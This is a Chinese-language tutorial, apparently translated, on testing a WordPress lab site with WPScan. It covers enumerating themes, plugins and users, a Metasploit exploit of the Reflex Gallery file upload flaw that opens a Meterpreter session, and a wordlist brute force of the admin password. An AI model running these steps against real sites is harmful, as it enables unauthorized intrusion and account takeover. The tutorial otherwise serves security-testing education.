WPScan使用完整攻略:如何對WordPress站點進(jìn)行安全測試。本文將告訴大家如何使用WPScan來對WordPress站點進(jìn)行安全測試。
WPScan是Kali Linux默認(rèn)自帶的一款漏洞掃描工具,它采用Ruby編寫,能夠掃描WordPress網(wǎng)站中的多種安全漏洞,其中包括主題漏洞、插件漏洞和WordPress本身的漏洞。最新版本W(wǎng)PScan的數(shù)據(jù)庫中包含超過18000種插件漏洞和2600種主題漏洞,并且支持最新版本的WordPress。值得注意的是,它不僅能夠掃描類似robots.txt這樣的敏感文件,而且還能夠檢測當(dāng)前已啟用的插件和其他功能。
接下來,讓我們進(jìn)入正題…
工具安裝與運行
Kali Linux默認(rèn)自帶了WPScan,你也可以使用下列命令在自己的設(shè)備中安裝WPScan:
git clone https://github.com/wpscanteam/wpscan.git
切換到WPScan目錄中,運行下列命令查看幫助信息:
./wpscan.rb–h
你也可以使用以下命令更新漏洞庫:
wpscan -update
掃描WordPress站點
我們可以使用–enumerate選項來掃描并發(fā)現(xiàn)關(guān)于目標(biāo)站點主題、插件和用戶名信息。輸入下列命令開始對服務(wù)器進(jìn)行掃描:
./wpscan.rb –u http://192.168.0.101/wordpress/
如果你不知道目標(biāo)服務(wù)器的IP地址,你可以直接輸入URL地址。下面給出的是掃描結(jié)果:
從結(jié)果中可以看到,服務(wù)器信息為Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1。我們還發(fā)現(xiàn),上傳目錄開啟了目錄監(jiān)聽功能,因此任何人都可以通過訪問wp-content/uploads來查看目錄中的上傳內(nèi)容。
主題掃描
使用下列命令對主題進(jìn)行掃描:
./wpsca.rb –u http://192.168.0.101/wordpress --enumerate t
使用下列命令掃描主題中存在的漏洞:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt
插件掃描
插件可以擴(kuò)展WordPress站點的功能,但很多插件中都存在安全漏洞,而這也會給攻擊者提供可乘之機。
我們可以使用下列命令掃描WordPress站點中安裝的插件:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p
我們可以看到該網(wǎng)站中安裝了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3以及很多其他的插件。
接下來,我們可以使用下列命令來掃描目標(biāo)插件中的安全漏洞:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp
我們可以從掃描結(jié)果中看到這三款插件中存在的漏洞以及利用路徑:
結(jié)合Metasploit利用插件中的漏洞
接下來,我們將用第一個插件中的任意文件上傳漏洞來進(jìn)行漏洞利用演示,該漏洞允許我們上傳惡意文件并實現(xiàn)遠(yuǎn)程代碼執(zhí)行。
打開終端窗口并輸入下列命令:
useexploit/unix/webapp/wp_reflexgallery_file_upload
msfexploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101
msfexploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/
msfexploit(wp_reflexgallery_file_upload) > exploit
你將看到終端與目標(biāo)設(shè)備建立了Meterpreter會話,你可以輸入下列命令查看目標(biāo)系統(tǒng)信息:
Sysinfo
枚舉WordPress用戶名
我們可以在終端中輸入下列命令來枚舉WordPress用戶名:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u
接下來工具將導(dǎo)出用戶名數(shù)據(jù)表,你可以看到用戶名以及對應(yīng)的ID信息。
當(dāng)然了,你也可以使用下列命令枚舉出所有的內(nèi)容:
./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u
–e at : enumerate all themes of targeted website
–e ap: enumerate all plugins of targeted website
–e u: enumerate all usernames of targeted website
使用WPScan進(jìn)行暴力破解
在進(jìn)行暴力破解攻擊之前,我們需要創(chuàng)建對應(yīng)的字典文件。輸入下列命令:
./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --usernameadmin
如果找到了相匹配的用戶名與密碼,工具將直接以admin:password的形式顯示出來:

|